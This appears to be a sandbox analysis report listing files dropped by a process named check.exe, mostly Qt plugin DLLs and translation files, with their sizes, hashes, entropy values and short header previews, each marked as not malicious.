                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):421360
                                                                                                                                                                                                            Entropy (8bit):5.7491063936821405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:USgOWz1eW38u9tyh6fpGUasBKTrsXWwMmH1l3JM5hn0uEfB4:USPQTnastBRB4
                                                                                                                                                                                                            MD5:16ABCCEB70BA20E73858E8F1912C05CD
                                                                                                                                                                                                            SHA1:4B3A32B166AB5BBBEE229790FDAE9CBC84F936BA
                                                                                                                                                                                                            SHA-256:FB4E980CB5FAFA8A4CD4239329AED93F7C32ED939C94B61FB2DF657F3C6AD158
                                                                                                                                                                                                            SHA-512:3E5C83967BF31C9B7F1720059DD51AA4338E518B076B0461541C781B076135E9CB9CBCEB13A8EC9217104517FBCC356BDD3FFACA7956D1C939E43988151F6273
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Iv"...L...L...L..o....L..xM...L..|M...L.......L..xI...L..xH...L..xO...L..gM...L...M...L..gH.?.L..gI...L..gL...L..g....L..gN...L.Rich..L.........PE..d...o._.........." .....b...........i...............................................g....`.............................................t...............@....`.......R..............h...T.......................(.......0...............@............................text....`.......b.................. ..`.rdata..J............f..............@..@.data...8....P.......(..............@....pdata.......`... ...*..............@..@.qtmetad.............J..............@..P.rsrc...@............L..............@..@.reloc...............P..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32240
                                                                                                                                                                                                            Entropy (8bit):5.978149408776758
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:uOVKDlJJVlTuLiMtsKVG7TSdDG9Uf2h4e:hVgJVlTuL/tsKVG7TSQUfre
                                                                                                                                                                                                            MD5:C0DE135782FA0235A0EA8E97898EAF2A
                                                                                                                                                                                                            SHA1:FCF5FD99239BF4E0B17B128B0EBEC144C7A17DE2
                                                                                                                                                                                                            SHA-256:B3498F0A10AC4CB42CF7213DB4944A34594FF36C78C50A0F249C9085D1B1FF39
                                                                                                                                                                                                            SHA-512:7BD5F90CCAB3CF50C55EAF14F7EF21E05D3C893FA7AC9846C6CA98D6E6D177263AC5EB8A85A34501BCFCA0DA7F0B6C39769726F4090FCA2231EE64869B81CF0B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x>...P...P...P..a...P.&vQ...P..rQ...P.&vU...P.&vT...P.&vS...P.kiQ...P...Q.n.P.kiU...P.kiP...P.ki....P.kiR...P.Rich..P.........PE..d......_.........." .....$...B......D)....................................................`.........................................PU..t....U..........@............b...............G..T....................I..(...PH..0............@..(............................text....".......$.................. ..`.rdata...+...@...,...(..............@..@.data...8....p.......T..............@....pdata...............V..............@..@.qtmetad.............Z..............@..P.rsrc...@............\..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):31728
                                                                                                                                                                                                            Entropy (8bit):5.865766652452823
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:1lGALluUEAQATWQ79Z2Y8Ar+dDG2vUf2hF:TZl/EH8WQ794Y8Ar+hvUfm
                                                                                                                                                                                                            MD5:A913276FA25D2E6FD999940454C23093
                                                                                                                                                                                                            SHA1:785B7BC7110218EC0E659C0E5ACE9520AA451615
                                                                                                                                                                                                            SHA-256:5B641DEC81AEC1CF7AC0CCE9FC067BB642FBD32DA138A36E3BDAC3BB5B36C37A
                                                                                                                                                                                                            SHA-512:CEBE48E6E6C5CDF8FC339560751813B8DE11D2471A3DAB7D648DF5B313D85735889D4E704E8EEC0AD1084AB43BE0EBDFBACD038AEAC46D7A951EFB3A7CE838EB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F ._'N._'N._'N.V_.Y'N..HO.]'N.KLO.]'N..HK.M'N..HJ.W'N..HM.\'N..WO.Z'N._'O.4'N..WK.\'N..WN.^'N..W..^'N..WL.^'N.Rich_'N.........................PE..d......_.........." ....."...@.......'..............................................7.....`..........................................W..t...dX..........@.......`....`..............(I..T....................J..(....I..0............@..h............................text...[!.......".................. ..`.rdata...)...@...*...&..............@..@.data........p.......P..............@....pdata..`............T..............@..@.qtmetadu............X..............@..P.rsrc...@............Z..............@..@.reloc...............^..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):390128
                                                                                                                                                                                                            Entropy (8bit):5.724665470266677
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:V0jqHiFBaRe0GPAKwP15e7xrEEEEEEN024Rx/3tkYiHUASQbs/l7OanYoOgyV:0qqwP15bx/q7/yyV
                                                                                                                                                                                                            MD5:9C0ACF12D3D25384868DCD81C787F382
                                                                                                                                                                                                            SHA1:C6E877ABA3FB3D2F21D86BE300E753E23BB0B74E
                                                                                                                                                                                                            SHA-256:825174429CED6B3DAB18115DBC6C9DA07BF5248C86EC1BD5C0DCAECA93B4C22D
                                                                                                                                                                                                            SHA-512:45594FA3C5D7C4F26325927BB8D51B0B88E162E3F5E7B7F39A5D72437606383E9FDC8F83A77F814E45AFF254914514AE52C1D840A6C7B98767F362ED3F4FC5BD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................E....q............q......q......q......<.............<......<......<......<.)....<......Rich....................PE..d......_.........." .....(..........D-.......................................0............`.............................................t...4...........@........%........... ..(....d..T................... f..(....d..0............@..0............................text....&.......(.................. ..`.rdata...v...@...x...,..............@..@.data...(...........................@....pdata...%.......&..................@..@.qtmetad............................@..P.rsrc...@...........................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):30192
                                                                                                                                                                                                            Entropy (8bit):5.938644231596902
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:EfEM3S46JE2X/xBZ76pC5J6GdDGZUf2h4:63S3JE2PHZ76pC5J6GEUfn
                                                                                                                                                                                                            MD5:68919381E3C64E956D05863339F5C68C
                                                                                                                                                                                                            SHA1:CE0A2AD1F1A46B61CB298CEC5AA0B25FF2C12992
                                                                                                                                                                                                            SHA-256:0F05969FB926A62A338782B32446EA3E28E4BFBFFC0DBD25ED303FAB3404ABAC
                                                                                                                                                                                                            SHA-512:6222A3818157F6BCD793291A6C0380EF8C6B93ECEA2E0C9A767D9D9163461B541AFAF8C6B21C5A020F01C95C6EE9B2B74B358BA18DA120F520E87E24B20836AA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<.I.<.I.<.I.D%I.<.I.S.H.<.I.W.H.<.I.S.H.<.I.S.H.<.I.S.H.<.IYL.H.<.I.<.I.<.IYL.H.<.IYL.H.<.IYLII.<.IYL.H.<.IRich.<.I........PE..d......_.........." ..... ...8.......'....................................................`......................................... D..t....D..........@....p..T....Z...............6..T...................p8..(...@7..0............0..p............................text............ .................. ..`.rdata..d&...0...(...$..............@..@.data........`.......L..............@....pdata..T....p.......N..............@..@.qtmetad~............R..............@..P.rsrc...@............T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):510448
                                                                                                                                                                                                            Entropy (8bit):6.605517748735854
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:bPTjgdqdsvh+LrLrLrL5/y4DVHAsqx3hXS+oPZQqRaYG:jT5sMLrLrLrL5q4dAsaOFo
                                                                                                                                                                                                            MD5:308E4565C3C5646F9ABD77885B07358E
                                                                                                                                                                                                            SHA1:71CB8047A9EF0CDB3EE27428726CACD063BB95B7
                                                                                                                                                                                                            SHA-256:6E37ACD0D357871F92B7FDE7206C904C734CAA02F94544DF646957DF8C4987AF
                                                                                                                                                                                                            SHA-512:FFAEECFAE097D5E9D1186522BD8D29C95CE48B87583624EB6D0D52BD19E36DB2860A557E19F0A05847458605A9A540C2A9899D53D36A6B7FD5BF0AD86AF88124
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................a....s........s......s......s....>.........>......>.....>....>......>....Rich...................PE..d......_.........." .....B..........tH.......................................0......`q....`..........................................W..t....W..........@.......0H........... ......h...T.......................(.......0............`...............................text...[@.......B.................. ..`.rdata..J....`.......F..............@..@.data....'...........X..............@....pdata..0H.......J...\..............@..@.qtmetadv...........................@..P.rsrc...@...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):844784
                                                                                                                                                                                                            Entropy (8bit):6.625808732261156
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:y6MhioHKQ1ra8HT+bkMY8zKI4kwU7dFOTTYfEWmTxbwTlWc:BMhioHKQp+bkjAjwGdFSZtbwBd
                                                                                                                                                                                                            MD5:2F6D88F8EC3047DEAF174002228219AB
                                                                                                                                                                                                            SHA1:EB7242BB0FE74EA78A17D39C76310A7CDD1603A8
                                                                                                                                                                                                            SHA-256:05D1E7364DD2A672DF3CA44DD6FD85BED3D3DC239DCFE29BFB464F10B4DAA628
                                                                                                                                                                                                            SHA-512:0A895BA11C81AF14B5BD1A04A450D6DCCA531063307C9EF076E9C47BD15F4438837C5D425CAEE2150F3259691F971D6EE61154748D06D29E4E77DA3110053B54
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#\..B2..B2..B2..:...B2..-3..B2.F....B2..-7..B2..-6..B2..-1..B2..)6..B2.^23..B2..)3..B2..B3.@2.^26..B2.^27..B2.^22..B2.^2...B2.^20..B2.Rich.B2.........PE..d...N._.........." ......................................................... ............`......................................... ...x.......@.......H....`..H.......................T.......................(.......0...............(............................text...;........................... ..`.rdata...C.......D..................@..@.data...H....@......."..............@....pdata..H....`.......0..............@..@.qtmetad............................@..P.rsrc...H...........................@..@.reloc..............................@..B................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):754672
                                                                                                                                                                                                            Entropy (8bit):6.6323155845799695
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:/HpBmyVIRZ3Tck83vEgex5aebusGMIlhLfEWmpCJkl:/HpB63TckUcLaHMITAZmW
                                                                                                                                                                                                            MD5:6407499918557594916C6AB1FFEF1E99
                                                                                                                                                                                                            SHA1:5A57C6B3FFD51FC5688D5A28436AD2C2E70D3976
                                                                                                                                                                                                            SHA-256:54097626FAAE718A4BC8E436C85B4DED8F8FB7051B2B9563A29AEE4ED5C32B7B
                                                                                                                                                                                                            SHA-512:8E8ABB563A508E7E75241B9720A0E7AE9C1A59DD23788C74E4ED32A028721F56546792D6CCA326F3D6AA0A62FDEDC63BF41B8B74187215CD3B26439F40233F4D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m..T..KT..KT..K]t7K@..K.c.JV..K@g.JV..K.cKU..K.c.JA..K.c.J\..K.c.JP..K.|.JQ..KT..K...K.|.Js..K.|.JS..K.|.JU..K.|[KU..K.|.JU..KRichT..K........PE..d...R._.........." ................L.....................................................`.............................................x...8...........H....... s...h..........p.......T................... ...(.......0...............@............................text............................... ..`.rdata..............................@..@.data...............................@....pdata.. s.......t..................@..@.qtmetad.............T..............@..P.rsrc...H............V..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):482288
                                                                                                                                                                                                            Entropy (8bit):6.152380961313931
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:WO/vyK+DtyaHlIMDhg5WEOvAwKB2VaaHeqRw/yVfYu4UnCA6DEjeYchcD+1Zy2:bKtHOWg5OvAwK0NYu4AShcD+1U2
                                                                                                                                                                                                            MD5:1EDCB08C16D30516483A4CBB7D81E062
                                                                                                                                                                                                            SHA1:4760915F1B90194760100304B8469A3B2E97E2BC
                                                                                                                                                                                                            SHA-256:9C3B2FA2383EEED92BB5810BDCF893AE30FA654A30B453AB2E49A95E1CCF1631
                                                                                                                                                                                                            SHA-512:0A923495210B2DC6EB1ACEDAF76D57B07D72D56108FD718BD0368D2C2E78AE7AC848B90D90C8393320A3D800A38E87796965AFD84DA8C1DF6C6B244D533F0F39
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gM..#...#...#..~....#.ei&...#.ei'...#.ei ...#..m'...#.ei"...#.(v"...#..m"...#..."...#.(v&...#.(v#...#.(v...#.(v!...#.Rich..#.................PE..d......_.........." .....R...........;....................................................`..........................................m..t...Dn..T.......@....@...=...@..............0...T.......................(.......0............p..(............................text...{Q.......R.................. ..`.rdata..:....p.......V..............@..@.data...H....0......................@....pdata...=...@...>..................@..@.qtmetadz............2..............@..P.rsrc...@............4..............@..@.reloc...............8..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1477104
                                                                                                                                                                                                            Entropy (8bit):6.575113537540671
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:4mCSPJrAbXEEuV9Hw2SoYFo3HdxjEgqJkLdLu5qpmZuhg/A2b:nPlIEEuV9Hw2SFFWHdWZsdmqja/A2b
                                                                                                                                                                                                            MD5:4931FCD0E86C4D4F83128DC74E01EAAD
                                                                                                                                                                                                            SHA1:AC1D0242D36896D4DDA53B95812F11692E87D8DF
                                                                                                                                                                                                            SHA-256:3333BA244C97264E3BD19DB5953EFA80A6E47AACED9D337AC3287EC718162B85
                                                                                                                                                                                                            SHA-512:0396BCCDA43856950AFE4E7B16E0F95D4D48B87473DC90CF029E6DDFD0777E1192C307CFE424EAE6FB61C1B479F0BA1EF1E4269A69C843311A37252CF817D84D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i...-...-...-...$.%.9.....q.,......8......%......)......+...9......9..,......)..........9..8...-..........d......,.....I.,......,...Rich-...........PE..d....._.........." .....,...h......4+..............................................n.....`.............................................x...(...........H............n..........X....r..T...................Pt..(... s..0............@...5...........................text..._+.......,.................. ..`.rdata.......@.......0..............@..@.data....m...@...D...(..............@....pdata...............l..............@..@.qtmetad.............J..............@..P.rsrc...H............L..............@..@.reloc..X............P..............@..B........................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):68592
                                                                                                                                                                                                            Entropy (8bit):6.125954940500008
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:Nt4B1RLj3S6TtH2sweUH+Hz6/4+D6VFsfvUfO:AB1RHFdoeUs6/4O6VFSZ
                                                                                                                                                                                                            MD5:F66F6E9EDA956F72E3BB113407035E61
                                                                                                                                                                                                            SHA1:97328524DA8E82F5F92878F1C0421B38ECEC1E6C
                                                                                                                                                                                                            SHA-256:E23FBC1BEC6CEEDFA9FD305606A460D9CAC5D43A66D19C0DE36E27632FDDD952
                                                                                                                                                                                                            SHA-512:7FF76E83C8D82016AB6BD349F10405F30DEEBE97E8347C6762EB71A40009F9A2978A0D8D0C054CF7A3D2D377563F6A21B97DDEFD50A9AC932D43CC124D7C4918
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o...o...o...f...k......m...{..m......~......h......m......h...o..........k......n.....~.n......n...Richo...........................PE..d...V._.........." .....z...t......T........................................@.......b....`......................................... ................ ..X....................0..4.......T.......................(...p...0...............x............................text....y.......z.................. ..`.rdata...Z.......\...~..............@..@.data...............................@....pdata..............................@..@.qtmetad............................@..P.rsrc...X.... ......................@..@.reloc..4....0......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):144368
                                                                                                                                                                                                            Entropy (8bit):6.294675868932723
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:rrjwZ43rCOtrBk7wcR0l7wBlaL6BtIEt51T0Nhkqg8FoQY:7hZu9R0l7wFBtIEt51T0Nuqg8JY
                                                                                                                                                                                                            MD5:53A85F51054B7D58D8AD7C36975ACB96
                                                                                                                                                                                                            SHA1:893A757CA01472A96FB913D436AA9F8CFB2A297F
                                                                                                                                                                                                            SHA-256:D9B21182952682FE7BA63AF1DF24E23ACE592C35B3F31ECEEF9F0EABEB5881B9
                                                                                                                                                                                                            SHA-512:35957964213B41F1F21B860B03458404FBF11DAF03D102FBEA8C2B2F249050CEFBB348EDC3F22D8ECC3CB8ABFDC44215C2DC9DA029B4F93A7F40197BD0C16960
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R._...1]..1]..1]..]..1]..0\..1]..5\..1]..2\..1]..4\..1]..0\..1]..0\..1]..0]..1]..4\..1]..1\..1]...]..1]..3\..1]Rich..1]........................PE..d...`._.........." .....\...........`.......................................`......wJ....`................................................. ........@..X.... ...............P.........T...................`...(...0...0............p...............................text....Z.......\.................. ..`.rdata......p.......`..............@..@.data...............................@....pdata....... ......................@..@.qtmetadm....0......................@..P.rsrc...X....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):130
                                                                                                                                                                                                            Entropy (8bit):4.024232093209084
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/2/vlAlHekW3/S1MUe3/CLlI+rwtbWlMrNtYs8ar/u:Cwm+/PtUePCRIRt6Ygs8y/u
                                                                                                                                                                                                            MD5:8FF05B56C0995F90A80B7064AA6E915C
                                                                                                                                                                                                            SHA1:D5AEB09AE557CEEFB758972EC4AC624CDDC9E6A7
                                                                                                                                                                                                            SHA-256:A8A1B0D6F958E7366D1C856BE61000106D3E7FC993FB931675369892B9002D0B
                                                                                                                                                                                                            SHA-512:5374E0F1D3F5A6A456B00732DE8005787B17ECEF9C8A2B2C1228966A6A8DE211700334D8FD789DAD269F52D0AEED3F5160010CA60909861E270C253B3EA881A4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ar....R.....q.t.b.a.s.e._.a.r.....q.t.s.c.r.i.p.t._.a.r.....q.t.m.u.l.t.i.m.e.d.i.a._.a.r..............$...*.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6813848812976975
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/6lLlAlHekVYtzlY1MUdI7lULlI+rwtbWlMoIFl8IPldkO4t/z:CwDC+7tJjUWhURIRt68f8oiP1z
                                                                                                                                                                                                            MD5:466EED6C184D2055488D4C5EA9AE5F20
                                                                                                                                                                                                            SHA1:8599AB9B731BFC84F6EEC7A0129F396FB8FEC4EA
                                                                                                                                                                                                            SHA-256:9E1CE4D91852352043D9191F1A992838F919CBA7E2F2D9BB1161E494E8BF5F5E
                                                                                                                                                                                                            SHA-512:D2462951EC7DCE3D0851AE9C4ED644FFE0D2A5BDD15B4AE1A4295C187B4295BC854D6A5038DAC0564D165463419D615EB6CE7A9760CEFAD71AB673FB2109C349
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......bg....v.....q.t.b.a.s.e._.b.g.....q.t.s.c.r.i.p.t._.b.g.....q.t.m.u.l.t.i.m.e.d.i.a._.b.g... .q.t.x.m.l.p.a.t.t.e.r.n.s._.b.g.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.631479835393124
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/NVl/lAlHekUOplY1MUce/hlAlI+rwtbWlMpOflUlIPldkOHlz:CwO4+94jUcerAIRt6a6Uloi8
                                                                                                                                                                                                            MD5:6FBA66FE449866B478A2EBA66A724A02
                                                                                                                                                                                                            SHA1:EBEF6ED8460218CE8DF735659A8CBCD693600AC6
                                                                                                                                                                                                            SHA-256:171C7424B24D8502AB53CB3784FF34D8FCFAE26557CF8AF4DFDDEC6485ACC2FE
                                                                                                                                                                                                            SHA-512:2D2438738C6D10D8A53B46DE5A94BBF993818D080F344D9F1B94FC83D60335D9A5E8EFCC297D593FFF1D427972F9F9502FC31C332CAEA579FC7A88487390457E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ca....v.....q.t.b.a.s.e._.c.a.....q.t.s.c.r.i.p.t._.c.a.....q.t.m.u.l.t.i.m.e.d.i.a._.c.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.a.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):157
                                                                                                                                                                                                            Entropy (8bit):3.7483537099309427
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/fVFlAlHekUsplY1MUcM/hlULlI+rwtbWlMpsfl8IPldkO1lPchn:CwY4+9ujUcMrURIRt6aE8oinh
                                                                                                                                                                                                            MD5:D033053C03C3ECFA2AA926E0E674F67F
                                                                                                                                                                                                            SHA1:B4E95F8278121E2549F8BB6B5DAF1496F1738A7D
                                                                                                                                                                                                            SHA-256:3C0CBFD19490D67D1B3B9E944C3A4D9A9E7F87D7AE35E88D5D5A0077349B5B21
                                                                                                                                                                                                            SHA-512:2C7E9E9DBE0B25FBA94A52FE4BCCB1D9FED2A7BD2877DB91F82546C3BC8606280949594227BA0FC1C74C31010E1F573B3A82852BE746EAA4F397140485789136
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......cs....v.....q.t.b.a.s.e._.c.s.....q.t.s.c.r.i.p.t._.c.s.....q.t.m.u.l.t.i.m.e.d.i.a._.c.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.s...........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/4Jlr/lAlHekT6hY1MUb6JAlI+rwtbWlMuel3UlIPldkOQtt:Cw7rC+3jUkAIRt6EVUloi9
                                                                                                                                                                                                            MD5:E6A683F4A0883B5B0C7D30B847EF208C
                                                                                                                                                                                                            SHA1:FF2440DBBFE04AD86C6F285426AAFD49A895B128
                                                                                                                                                                                                            SHA-256:B5036161CE808C728E5FDA985F792DB565831FD01CF00B282547790C037353A2
                                                                                                                                                                                                            SHA-512:D73B794A71DFD3A3C06BF43ED109F635B4960F9A3904FB728873AB5251BDF6A791DDFDEBA884A2703A35461E18BA902804095AC4B92A2C9361526469B6D35FFA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......da....v.....q.t.b.a.s.e._.d.a.....q.t.s.c.r.i.p.t._.d.a.....q.t.m.u.l.t.i.m.e.d.i.a._.d.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.a.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/8rJFlAlHekTul01MUbul4LlI+rwtbWlMuallyIPldkOknt:Cw/rJ4+XU5RIRt6Aaoi7t
                                                                                                                                                                                                            MD5:06168E1261BF72F49F94927723B2E1EB
                                                                                                                                                                                                            SHA1:DEAF1B53C3FEE6CB28840418D0060AFA4D59D3FC
                                                                                                                                                                                                            SHA-256:5805B8FF3747849794E2D70661D737C69C15F1AE763C38E17084B1E5A81E9153
                                                                                                                                                                                                            SHA-512:AA3915C029C74DC270514C7F50E8BEC06C825F278E0DE0477AD8ED3187700BBD7711382A6E47C3AC76AC756CEFF9FA8CDD4E9B9DAC817475BC122F78B02C7D7D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......de....v.....q.t.b.a.s.e._.d.e.....q.t.s.c.r.i.p.t._.d.e.....q.t.m.u.l.t.i.m.e.d.i.a._.d.e... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.e.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):4.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                            MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                            SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                            SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                            SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                            Malicious:false
